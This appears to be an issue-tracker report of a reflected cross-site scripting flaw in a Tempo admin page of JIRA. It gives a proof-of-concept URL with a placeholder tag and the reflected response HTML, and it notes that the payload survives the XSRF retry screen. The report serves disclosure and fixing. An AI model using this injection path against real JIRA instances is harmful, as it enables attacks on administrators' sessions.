XSS in /secure/admin/TempoServicesAccess.jspa

Type atlassian
Reporter sverrir
Modified 2017-04-02T05:04:42


{{allowedIPAccresses}} is passed unfiltered into the results page. Contents of the field persist through the "missing XSRF token" screen, so exploitation is trivial - just get your victim to click on the link without a token.

{noformat} /secure/admin/TempoServicesAccess.jspa?allowedIpAddresses=%3Cxss%3E&atl_token=BYRO-9FU9-UCXC-E6R7%7C1abd1e4580f1776e7c4a257414640e59c92fc1b0%7Clin&atl_token_retry_button=Retry+Operation {noformat}

Response (output appears in 2 places in the page)



                <tr class="descriptionrow">
            <td class="fieldValueArea" colspan="2">
                <div style="width: 80%;" class="aui-message error">
                    Misprint in Allowed addresses? Please check and save again. The offending input: <xss>

        <td class="fieldLabelArea">Allowed addresses</td>
        <td class="fieldValueArea" bgcolor="#ffffff">
            <textarea style="width:90%" rows="10" cols="50" id="allowedIpAddresses" name="allowedIpAddresses"><xss></textarea>


This is probably in Tempo

See fixing HOWTO at https://extranet.atlassian.com/display/SECCOUNCIL/HOWTO+-+Fixing+JIRA+Security+Issues